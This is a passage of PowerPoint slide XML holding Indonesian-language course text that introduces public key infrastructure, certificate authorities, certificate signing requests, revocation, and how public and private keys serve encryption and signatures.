              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Digital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kepercayaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12377781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Otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendistribusian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
